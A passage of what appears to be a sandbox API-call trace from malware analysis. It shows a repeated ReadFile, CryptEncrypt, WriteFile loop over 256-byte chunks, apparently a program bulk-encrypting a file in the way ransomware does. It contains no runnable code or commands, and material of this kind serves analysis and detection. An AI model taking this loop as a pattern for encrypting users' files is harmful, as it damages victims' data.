nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.610] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.610] GetLastError () returned 0x0 [0152.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.610] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.610] GetLastError () returned 0x0 [0152.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.614] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.614] GetLastError () returned 0x0 [0152.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.614] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.614] GetLastError () returned 0x0 [0152.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.614] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.614] GetLastError () returned 0x0 [0152.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.614] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.614] GetLastError () returned 0x0 [0152.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.614] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.614] GetLastError () returned 0x0 [0152.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.614] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.614] GetLastError () returned 0x0 [0152.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.615] GetLastError () returned 0x0 [0152.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.615] GetLastError () returned 0x0 [0152.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.615] GetLastError () returned 0x0 [0152.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.615] GetLastError () returned 0x0 [0152.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.615] GetLastError () returned 0x0 [0152.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.615] GetLastError () returned 0x0 [0152.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.615] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.616] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.616] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.616] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.616] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.616] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.616] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.616] GetLastError () returned 0x0 [0152.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.617] GetLastError () returned 0x0 [0152.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.617] GetLastError () returned 0x0 [0152.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.617] GetLastError () returned 0x0 [0152.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.617] GetLastError () returned 0x0 [0152.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.617] GetLastError () returned 0x0 [0152.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.617] GetLastError () returned 0x0 [0152.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.618] GetLastError () returned 0x0 [0152.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.618] GetLastError () returned 0x0 [0152.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.618] GetLastError () returned 0x0 [0152.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.618] GetLastError () returned 0x0 [0152.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.618] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.618] GetLastError () returned 0x0 [0152.618] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: 